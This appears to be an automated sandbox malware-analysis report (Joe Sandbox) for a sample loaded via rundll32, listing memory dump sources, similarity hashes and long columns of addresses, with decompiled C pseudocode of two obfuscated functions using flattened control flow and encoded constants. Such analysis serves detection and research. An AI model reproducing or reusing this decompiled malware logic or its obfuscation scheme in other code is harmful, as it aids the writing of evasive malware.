                                                                                                                      0x003636d7
                                                                                                                      0x003636de
                                                                                                                      0x003636e5
                                                                                                                      0x003636e9
                                                                                                                      0x003636ed
                                                                                                                      0x003636f4
                                                                                                                      0x003636fb
                                                                                                                      0x00363702
                                                                                                                      0x00363706
                                                                                                                      0x0036370d
                                                                                                                      0x00363718
                                                                                                                      0x0036371b
                                                                                                                      0x0036371f
                                                                                                                      0x00363726
                                                                                                                      0x0036372d
                                                                                                                      0x00363734
                                                                                                                      0x0036373b
                                                                                                                      0x0036373f
                                                                                                                      0x00363746
                                                                                                                      0x00363757
                                                                                                                      0x0036375c
                                                                                                                      0x0036377b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: 37796aa7341f54fca73baffffb1ff08bd463588895d51453ceca308a18707f4e
                                                                                                                      • Instruction ID: 33889f2df1fdcb0c6bbd26b20ce24562713dadac01b70f4233f33f0dd2d2dacc
                                                                                                                      • Opcode Fuzzy Hash: 37796aa7341f54fca73baffffb1ff08bd463588895d51453ceca308a18707f4e
                                                                                                                      • Instruction Fuzzy Hash: 7D31A1B6C0170AEBCF45DFE4C94A8AEFBB0BB50308F208588D51166261D7B54B59DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034CA43 Relevance: 2.7, Strings: 2, Instructions: 248COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0034CA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t229;
				void* _t247;
				void* _t251;
				void* _t257;
				void* _t260;
				void* _t261;
				void* _t263;
				intOrPtr _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				void* _t294;
				void* _t295;

				_push(_a16);
				_t287 = _a12;
				_t261 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t229);
				_v64 = 0x836860;
				_t288 = 0;
				_v60 = 0x763ad4;
				_t295 = _t294 + 0x18;
				_v56 = 0;
				_v132 = 0xf23cd2;
				_t263 = 0x1cd9a3d;
				_v132 = _v132 + 0xffff66b2;
				_v132 = _v132 + 0xffff69fc;
				_v132 = _v132 << 8;
				_v132 = _v132 ^ 0xf1039f05;
				_v140 = 0x375552;
				_v140 = _v140 << 6;
				_v140 = _v140 ^ 0xd2a5ef1f;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0x00122384;
				_v108 = 0x5e168a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 + 0xda32;
				_v108 = _v108 ^ 0x00005a0c;
				_v116 = 0x4fe29d;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x0003d351;
				_v88 = 0xa9a316;
				_v88 = _v88 + 0xe91b;
				_v88 = _v88 ^ 0x00a1e0df;
				_v136 = 0x77a290;
				_v136 = _v136 << 0xc;
				_t289 = 0x74;
				_v136 = _v136 / _t289;
				_v136 = _v136 + 0xffff257b;
				_v136 = _v136 ^ 0x01061e79;
				_v152 = 0x936910;
				_v152 = _v152 * 0x7a;
				_v152 = _v152 >> 3;
				_v152 = _v152 + 0xffff8db3;
				_v152 = _v152 ^ 0x08cdb86a;
				_v128 = 0x509c4c;
				_v128 = _v128 + 0x81f1;
				_v128 = _v128 + 0x9dbc;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00071675;
				_v148 = 0xcab80c;
				_v148 = _v148 >> 0xd;
				_v148 = _v148 | 0x660debd0;
				_v148 = _v148 + 0xf630;
				_v148 = _v148 ^ 0x660fbc32;
				_v104 = 0xc88284;
				_v104 = _v104 ^ 0xe0b202bb;
				_v104 = _v104 * 0x70;
				_v104 = _v104 ^ 0x35911582;
				_v84 = 0x688efd;
				_v84 = _v84 ^ 0xa5781683;
				_v84 = _v84 ^ 0xa515c2ff;
				_v156 = 0x3b8040;
				_v156 = _v156 | 0xffdbffba;
				_v156 = _v156 ^ 0xfff6b3f0;
				_v72 = 0x8d74e9;
				_v72 = _v72 >> 8;
				_v72 = _v72 ^ 0x0004dfda;
				_v160 = 0xbd1b1c;
				_v160 = _v160 << 0xc;
				_v160 = _v160 | 0x33bb8ca8;
				_v160 = _v160 ^ 0xcf7854ed;
				_v160 = _v160 ^ 0x3ccd45a9;
				_v120 = 0x48e6fb;
				_v120 = _v120 | 0xe61fffb2;
				_v120 = _v120 ^ 0xe6598779;
				_v68 = 0x77306;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x0008dc17;
				_v112 = 0x774006;
				_v112 = _v112 << 0xd;
				_v112 = _v112 + 0xffffb426;
				_v112 = _v112 ^ 0xe80ab914;
				_v144 = 0x2b5eea;
				_t290 = 0x79;
				_v144 = _v144 * 0x59;
				_v144 = _v144 + 0xffffa818;
				_v144 = _v144 ^ 0xb076c16e;
				_v144 = _v144 ^ 0xbf611da3;
				_v96 = 0xa17410;
				_v96 = _v96 | 0x939b80d1;
				_v96 = _v96 / _t290;
				_v96 = _v96 ^ 0x01375591;
				_v80 = 0xb3b8;
				_t291 = 0x5c;
				_v80 = _v80 / _t291;
				_v80 = _v80 ^ 0x0003830b;
				_v76 = 0xc52b4a;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 ^ 0x00071242;
				_v92 = 0xc8fd49;
				_t292 = 0x54;
				_v92 = _v92 / _t292;
				_v92 = _v92 ^ 0x044db90d;
				_v92 = _v92 ^ 0x044d9acc;
				_v100 = 0x5afe59;
				_v100 = _v100 ^ 0x0de7f0e8;
				_v100 = _v100 | 0x5cb6a54b;
				_v100 = _v100 ^ 0x5db2bb74;
				_v124 = 0xa19aac;
				_v124 = _v124 + 0xffff97b1;
				_v124 = _v124 * 0x3e;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 ^ 0x000bad60;
				while(_t263 != 0xd5ede2) {
					if(_t263 == 0x1cd9a3d) {
						_t263 = 0xd5ede2;
						continue;
					} else {
						if(_t263 == 0x72d0ec7) {
							_t247 = E0034B09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
							_t295 = _t295 + 0x10;
							__eflags = _t247;
							if(__eflags != 0) {
								_t263 = 0x78e1ae6;
								continue;
							}
						} else {
							if(_t263 == 0x78e1ae6) {
								_t251 = E0034B09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
								_t295 = _t295 + 0x10;
								__eflags = _t251;
								if(__eflags != 0) {
									_t263 = 0xabcd4f8;
									continue;
								}
							} else {
								if(_t263 == 0x7ae58b3) {
									__eflags = E0035B9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
									_t288 =  !=  ? 1 : _t288;
								} else {
									if(_t263 == 0xabcd4f8) {
										_t257 = E0034B09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
										_t295 = _t295 + 0x10;
										__eflags = _t257;
										if(__eflags != 0) {
											_t263 = 0x7ae58b3;
											continue;
										}
									} else {
										if(_t263 != 0xc0b979a) {
											L18:
											__eflags = _t263 - 0x38140c5;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t260 = E0034B09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
											_t295 = _t295 + 0x10;
											if(_t260 != 0) {
												_t263 = 0x72d0ec7;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t288;
				}
				E003564C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
				_t295 = _t295 + 0x10;
				_t263 = 0xc0b979a;
				goto L18;
			}













































                                                                                                                      0x0034ca4d
                                                                                                                      0x0034ca54
                                                                                                                      0x0034ca5b
                                                                                                                      0x0034ca5d
                                                                                                                      0x0034ca5e
                                                                                                                      0x0034ca65
                                                                                                                      0x0034ca6c
                                                                                                                      0x0034ca6d
                                                                                                                      0x0034ca6e
                                                                                                                      0x0034ca73
                                                                                                                      0x0034ca7e
                                                                                                                      0x0034ca80
                                                                                                                      0x0034ca8b
                                                                                                                      0x0034ca8e
                                                                                                                      0x0034ca94
                                                                                                                      0x0034ca9c
                                                                                                                      0x0034caa1
                                                                                                                      0x0034caa9
                                                                                                                      0x0034cab1
                                                                                                                      0x0034cab6
                                                                                                                      0x0034cabe
                                                                                                                      0x0034cac6
                                                                                                                      0x0034cacb
                                                                                                                      0x0034cad3
                                                                                                                      0x0034cad8
                                                                                                                      0x0034cae0
                                                                                                                      0x0034cae8
                                                                                                                      0x0034caed
                                                                                                                      0x0034caf5
                                                                                                                      0x0034cafd
                                                                                                                      0x0034cb05
                                                                                                                      0x0034cb0a
                                                                                                                      0x0034cb0f
                                                                                                                      0x0034cb17
                                                                                                                      0x0034cb1f
                                                                                                                      0x0034cb27
                                                                                                                      0x0034cb2f
                                                                                                                      0x0034cb37
                                                                                                                      0x0034cb42
                                                                                                                      0x0034cb45
                                                                                                                      0x0034cb49
                                                                                                                      0x0034cb51
                                                                                                                      0x0034cb59
                                                                                                                      0x0034cb66
                                                                                                                      0x0034cb6a
                                                                                                                      0x0034cb6f
                                                                                                                      0x0034cb77
                                                                                                                      0x0034cb7f
                                                                                                                      0x0034cb87
                                                                                                                      0x0034cb8f
                                                                                                                      0x0034cb97
                                                                                                                      0x0034cb9c
                                                                                                                      0x0034cba4
                                                                                                                      0x0034cbac
                                                                                                                      0x0034cbb1
                                                                                                                      0x0034cbb9
                                                                                                                      0x0034cbc1
                                                                                                                      0x0034cbc9
                                                                                                                      0x0034cbd1
                                                                                                                      0x0034cbde
                                                                                                                      0x0034cbe2
                                                                                                                      0x0034cbea
                                                                                                                      0x0034cbf2
                                                                                                                      0x0034cbfa
                                                                                                                      0x0034cc02
                                                                                                                      0x0034cc0a
                                                                                                                      0x0034cc12
                                                                                                                      0x0034cc1a
                                                                                                                      0x0034cc22
                                                                                                                      0x0034cc27
                                                                                                                      0x0034cc2f
                                                                                                                      0x0034cc37
                                                                                                                      0x0034cc3e
                                                                                                                      0x0034cc46
                                                                                                                      0x0034cc4e
                                                                                                                      0x0034cc56
                                                                                                                      0x0034cc5e
                                                                                                                      0x0034cc66
                                                                                                                      0x0034cc6e
                                                                                                                      0x0034cc76
                                                                                                                      0x0034cc7b
                                                                                                                      0x0034cc83
                                                                                                                      0x0034cc8b
                                                                                                                      0x0034cc90
                                                                                                                      0x0034cc98
                                                                                                                      0x0034cca0
                                                                                                                      0x0034ccaf
                                                                                                                      0x0034ccb2
                                                                                                                      0x0034ccb6
                                                                                                                      0x0034ccbe
                                                                                                                      0x0034ccc6
                                                                                                                      0x0034ccce
                                                                                                                      0x0034ccd6
                                                                                                                      0x0034cce6
                                                                                                                      0x0034ccea
                                                                                                                      0x0034ccf2
                                                                                                                      0x0034ccfe
                                                                                                                      0x0034cd03
                                                                                                                      0x0034cd09
                                                                                                                      0x0034cd11
                                                                                                                      0x0034cd19
                                                                                                                      0x0034cd1e
                                                                                                                      0x0034cd26
                                                                                                                      0x0034cd32
                                                                                                                      0x0034cd3a
                                                                                                                      0x0034cd3e
                                                                                                                      0x0034cd46
                                                                                                                      0x0034cd4e
                                                                                                                      0x0034cd56
                                                                                                                      0x0034cd5e
                                                                                                                      0x0034cd66
                                                                                                                      0x0034cd6e
                                                                                                                      0x0034cd76
                                                                                                                      0x0034cd83
                                                                                                                      0x0034cd87
                                                                                                                      0x0034cd8c
                                                                                                                      0x0034cd94
                                                                                                                      0x0034cda2
                                                                                                                      0x0034ceb1
                                                                                                                      0x00000000
                                                                                                                      0x0034cda8
                                                                                                                      0x0034cdae
                                                                                                                      0x0034ce9b
                                                                                                                      0x0034cea0
                                                                                                                      0x0034cea3
                                                                                                                      0x0034cea5
                                                                                                                      0x0034cea7
                                                                                                                      0x00000000
                                                                                                                      0x0034cea7
                                                                                                                      0x0034cdb4
                                                                                                                      0x0034cdba
                                                                                                                      0x0034ce65
                                                                                                                      0x0034ce6a
                                                                                                                      0x0034ce6d
                                                                                                                      0x0034ce6f
                                                                                                                      0x0034ce75
                                                                                                                      0x00000000
                                                                                                                      0x0034ce75
                                                                                                                      0x0034cdc0
                                                                                                                      0x0034cdc6
                                                                                                                      0x0034cf13
                                                                                                                      0x0034cf15
                                                                                                                      0x0034cdcc
                                                                                                                      0x0034cdd2
                                                                                                                      0x0034ce2f
                                                                                                                      0x0034ce34
                                                                                                                      0x0034ce37
                                                                                                                      0x0034ce39
                                                                                                                      0x0034ce3f
                                                                                                                      0x00000000
                                                                                                                      0x0034ce3f
                                                                                                                      0x0034cdd4
                                                                                                                      0x0034cdda
                                                                                                                      0x0034cede
                                                                                                                      0x0034cede
                                                                                                                      0x0034cee4
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034ceea
                                                                                                                      0x0034cde0
                                                                                                                      0x0034cdfc
                                                                                                                      0x0034ce01
                                                                                                                      0x0034ce06
                                                                                                                      0x0034ce0c
                                                                                                                      0x00000000
                                                                                                                      0x0034ce0c
                                                                                                                      0x0034ce06
                                                                                                                      0x0034cdda
                                                                                                                      0x0034cdd2
                                                                                                                      0x0034cdc6
                                                                                                                      0x0034cdba
                                                                                                                      0x0034cdae
                                                                                                                      0x0034cf24
                                                                                                                      0x0034cf24
                                                                                                                      0x0034ced1
                                                                                                                      0x0034ced6
                                                                                                                      0x0034ced9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7$^+
                                                                                                                      • API String ID: 0-4228232731
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: b163b94568a43deaedd92adc9e0380345f89afeaa8b08845bd920bb973de2e91
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: C9C151711083859FD7A9CE61C88981BFBE5FBC4388F10891DF69686260D7B5D949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035BE8C Relevance: 2.7, Strings: 2, Instructions: 225COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0035BE8C() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _t217;
				signed int _t223;
				void* _t224;
				void* _t226;
				signed int _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t248;
				void* _t251;
				void* _t256;
				void* _t258;

				_v580 = 0x2596f5;
				asm("stosd");
				_t227 = 0;
				_t229 = 0x1e;
				asm("stosd");
				_t251 = 0x1d7b34c;
				asm("stosd");
				_v624 = 0x892a55;
				_v624 = _v624 | 0xee7fd748;
				_v624 = _v624 ^ 0xeeffffdd;
				_v620 = 0x622f6;
				_v620 = _v620 + 0xbb0c;
				_v620 = _v620 + 0xffff07a8;
				_v620 = _v620 ^ 0x0005e5ab;
				_v632 = 0xb1aa42;
				_v632 = _v632 + 0xffffd879;
				_v632 = _v632 << 7;
				_v632 = _v632 ^ 0x58c15d83;
				_v668 = 0xaf491c;
				_v668 = _v668 | 0xa282f1df;
				_v668 = _v668 * 0x52;
				_v668 = _v668 ^ 0xbc704b9b;
				_v668 = _v668 ^ 0xa02fbf7e;
				_v604 = 0x754ed8;
				_v604 = _v604 / _t229;
				_v604 = _v604 ^ 0x00089259;
				_v636 = 0x96d5f2;
				_v636 = _v636 + 0xd4a1;
				_t230 = 0x30;
				_v636 = _v636 * 0x11;
				_v636 = _v636 ^ 0x0a12807c;
				_v660 = 0x62eec7;
				_v660 = _v660 >> 3;
				_v660 = _v660 / _t230;
				_v660 = _v660 ^ 0xcf464c50;
				_v660 = _v660 ^ 0xcf48190c;
				_v596 = 0xd58755;
				_v596 = _v596 + 0xffffee65;
				_v596 = _v596 ^ 0x00d4794f;
				_v652 = 0xd65add;
				_v652 = _v652 + 0x69d5;
				_v652 = _v652 + 0xffff6cdd;
				_t231 = 0x44;
				_v652 = _v652 * 0x6f;
				_v652 = _v652 ^ 0x5cddf580;
				_v592 = 0x774283;
				_v592 = _v592 / _t231;
				_v592 = _v592 ^ 0x00057017;
				_v608 = 0x66f034;
				_v608 = _v608 * 0x1b;
				_v608 = _v608 ^ 0x0ad54449;
				_v628 = 0x797189;
				_v628 = _v628 | 0xd7c49ce2;
				_v628 = _v628 + 0x4eb;
				_v628 = _v628 ^ 0xd7fc7544;
				_v644 = 0xc6323c;
				_t232 = 0x1a;
				_v644 = _v644 / _t232;
				_v644 = _v644 | 0xc7b29cf4;
				_v644 = _v644 ^ 0xc7b916af;
				_v640 = 0x832b72;
				_v640 = _v640 << 1;
				_v640 = _v640 ^ 0x03109e90;
				_v640 = _v640 ^ 0x021bea31;
				_v600 = 0x7e41eb;
				_v600 = _v600 ^ 0xc4682a67;
				_v600 = _v600 ^ 0xc419d008;
				_v648 = 0x2ae2e2;
				_v648 = _v648 ^ 0xaa2d9f28;
				_v648 = _v648 ^ 0xe0508244;
				_v648 = _v648 + 0xffff0ac8;
				_v648 = _v648 ^ 0x4a517815;
				_v656 = 0x46e590;
				_v656 = _v656 + 0xffffd71a;
				_v656 = _v656 << 0xb;
				_v656 = _v656 | 0x65ccd40d;
				_v656 = _v656 ^ 0x75e69a05;
				_v616 = 0x212081;
				_v616 = _v616 + 0xffff369d;
				_v616 = _v616 << 3;
				_v616 = _v616 ^ 0x010dc67b;
				_v612 = 0xde1992;
				_v612 = _v612 | 0x34451690;
				_v612 = _v612 ^ 0x34df36a3;
				_v664 = 0xb873dc;
				_t233 = 9;
				_t250 = _v612;
				_v664 = _v664 / _t233;
				_v664 = _v664 * 0x16;
				_v664 = _v664 << 6;
				_v664 = _v664 ^ 0x70bc85f2;
				_v672 = 0x9e756b;
				_v672 = _v672 + 0xfffff8a5;
				_v672 = _v672 << 4;
				_v672 = _v672 * 0x17;
				_v672 = _v672 ^ 0xe3b54af9;
				do {
					while(_t251 != 0x1d7b34c) {
						if(_t251 == 0x2564c7d) {
							_t217 = E0035BC49(_t250, _v628, _v644, _v640,  &_v564, _v600);
							_t234 = _v648;
							asm("sbb esi, esi");
							_t251 = ( ~_t217 & 0xf96b950b) + 0xe5304db;
							E00354DAD(_v648, _v656, _t250, _v616, _v612);
							_t258 = _t258 + 0x24;
							goto L14;
						} else {
							if(_t251 == 0x7be99e6) {
								_t248 = _v672;
								E0035BBB2(_v664, _t248,  &_v588);
								_pop(_t234);
								_t251 = 0xba7f047;
								continue;
							} else {
								if(_t251 == 0xb29cf6f) {
									_t234 = 0;
									_t248 = _v624;
									_t223 = E0035E938(0, _t248, _v660, _v596, _v632, 0, _v652, _v592, 0, _v608, _v620,  &_v524);
									_t250 = _t223;
									_t258 = _t258 + 0x28;
									__eflags = _t223 - 0xffffffff;
									if(__eflags != 0) {
										_t251 = 0x2564c7d;
										continue;
									}
								} else {
									if(_t251 == 0xba7f047) {
										_t224 = E00349A1E();
										_t256 = _v588 - _v548;
										asm("sbb ecx, [esp+0x94]");
										__eflags = _v584 - _t248;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t256 - _t224;
												if(_t256 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t265 = _t251 - 0xcb5264b;
										if(_t251 != 0xcb5264b) {
											goto L14;
										} else {
											_t248 = _v668;
											_t226 = E003612A8(_t234, _t248, _t265, _v604, _v636,  &_v524);
											_t258 = _t258 + 0xc;
											if(_t226 != 0) {
												_t251 = 0xb29cf6f;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					_t251 = 0xcb5264b;
					L14:
					__eflags = _t251 - 0xe5304db;
				} while (__eflags != 0);
				goto L20;
			}













































                                                                                                                      0x0035be92
                                                                                                                      0x0035bea6
                                                                                                                      0x0035bea7
                                                                                                                      0x0035beab
                                                                                                                      0x0035beae
                                                                                                                      0x0035beaf
                                                                                                                      0x0035beb4
                                                                                                                      0x0035beb5
                                                                                                                      0x0035bebd
                                                                                                                      0x0035bec5
                                                                                                                      0x0035becd
                                                                                                                      0x0035bed5
                                                                                                                      0x0035bedd
                                                                                                                      0x0035bee5
                                                                                                                      0x0035beed
                                                                                                                      0x0035bef5
                                                                                                                      0x0035befd
                                                                                                                      0x0035bf02
                                                                                                                      0x0035bf0a
                                                                                                                      0x0035bf12
                                                                                                                      0x0035bf1f
                                                                                                                      0x0035bf23
                                                                                                                      0x0035bf2b
                                                                                                                      0x0035bf33
                                                                                                                      0x0035bf43
                                                                                                                      0x0035bf47
                                                                                                                      0x0035bf4f
                                                                                                                      0x0035bf57
                                                                                                                      0x0035bf64
                                                                                                                      0x0035bf67
                                                                                                                      0x0035bf6b
                                                                                                                      0x0035bf73
                                                                                                                      0x0035bf7b
                                                                                                                      0x0035bf88
                                                                                                                      0x0035bf8c
                                                                                                                      0x0035bf94
                                                                                                                      0x0035bf9c
                                                                                                                      0x0035bfa4
                                                                                                                      0x0035bfac
                                                                                                                      0x0035bfb4
                                                                                                                      0x0035bfbc
                                                                                                                      0x0035bfc4
                                                                                                                      0x0035bfd1
                                                                                                                      0x0035bfd4
                                                                                                                      0x0035bfd8
                                                                                                                      0x0035bfe0
                                                                                                                      0x0035bfee
                                                                                                                      0x0035bff2
                                                                                                                      0x0035bffa
                                                                                                                      0x0035c007
                                                                                                                      0x0035c00b
                                                                                                                      0x0035c013
                                                                                                                      0x0035c01b
                                                                                                                      0x0035c023
                                                                                                                      0x0035c02b
                                                                                                                      0x0035c035
                                                                                                                      0x0035c041
                                                                                                                      0x0035c046
                                                                                                                      0x0035c04c
                                                                                                                      0x0035c059
                                                                                                                      0x0035c061
                                                                                                                      0x0035c069
                                                                                                                      0x0035c06d
                                                                                                                      0x0035c075
                                                                                                                      0x0035c07d
                                                                                                                      0x0035c085
                                                                                                                      0x0035c08d
                                                                                                                      0x0035c095
                                                                                                                      0x0035c09d
                                                                                                                      0x0035c0a5
                                                                                                                      0x0035c0ad
                                                                                                                      0x0035c0b5
                                                                                                                      0x0035c0bd
                                                                                                                      0x0035c0c5
                                                                                                                      0x0035c0cd
                                                                                                                      0x0035c0d2
                                                                                                                      0x0035c0da
                                                                                                                      0x0035c0e2
                                                                                                                      0x0035c0ea
                                                                                                                      0x0035c0f2
                                                                                                                      0x0035c0f7
                                                                                                                      0x0035c0ff
                                                                                                                      0x0035c107
                                                                                                                      0x0035c10f
                                                                                                                      0x0035c117
                                                                                                                      0x0035c123
                                                                                                                      0x0035c126
                                                                                                                      0x0035c12a
                                                                                                                      0x0035c133
                                                                                                                      0x0035c137
                                                                                                                      0x0035c13c
                                                                                                                      0x0035c144
                                                                                                                      0x0035c14c
                                                                                                                      0x0035c154
                                                                                                                      0x0035c15e
                                                                                                                      0x0035c162
                                                                                                                      0x0035c16a
                                                                                                                      0x0035c16a
                                                                                                                      0x0035c178
                                                                                                                      0x0035c254
                                                                                                                      0x0035c269
                                                                                                                      0x0035c26d
                                                                                                                      0x0035c276
                                                                                                                      0x0035c27c
                                                                                                                      0x0035c281
                                                                                                                      0x00000000
                                                                                                                      0x0035c17e
                                                                                                                      0x0035c184
                                                                                                                      0x0035c21e
                                                                                                                      0x0035c22b
                                                                                                                      0x0035c230
                                                                                                                      0x0035c231
                                                                                                                      0x00000000
                                                                                                                      0x0035c18a
                                                                                                                      0x0035c190
                                                                                                                      0x0035c1f3
                                                                                                                      0x0035c200
                                                                                                                      0x0035c204
                                                                                                                      0x0035c209
                                                                                                                      0x0035c20b
                                                                                                                      0x0035c20e
                                                                                                                      0x0035c211
                                                                                                                      0x0035c217
                                                                                                                      0x00000000
                                                                                                                      0x0035c217
                                                                                                                      0x0035c192
                                                                                                                      0x0035c198
                                                                                                                      0x0035c299
                                                                                                                      0x0035c2a2
                                                                                                                      0x0035c2ad
                                                                                                                      0x0035c2b4
                                                                                                                      0x0035c2b6
                                                                                                                      0x0035c2b8
                                                                                                                      0x0035c2be
                                                                                                                      0x0035c2c0
                                                                                                                      0x0035c2c0
                                                                                                                      0x0035c2ba
                                                                                                                      0x0035c2ba
                                                                                                                      0x0035c2bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035c2bc
                                                                                                                      0x0035c2b8
                                                                                                                      0x0035c19e
                                                                                                                      0x0035c19e
                                                                                                                      0x0035c1a4
                                                                                                                      0x00000000
                                                                                                                      0x0035c1aa
                                                                                                                      0x0035c1ba
                                                                                                                      0x0035c1be
                                                                                                                      0x0035c1c3
                                                                                                                      0x0035c1c8
                                                                                                                      0x0035c1ce
                                                                                                                      0x00000000
                                                                                                                      0x0035c1ce
                                                                                                                      0x0035c1c8
                                                                                                                      0x0035c1a4
                                                                                                                      0x0035c198
                                                                                                                      0x0035c190
                                                                                                                      0x0035c184
                                                                                                                      0x0035c2c4
                                                                                                                      0x0035c2cd
                                                                                                                      0x0035c2cd
                                                                                                                      0x0035c286
                                                                                                                      0x0035c28b
                                                                                                                      0x0035c28b
                                                                                                                      0x0035c28b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
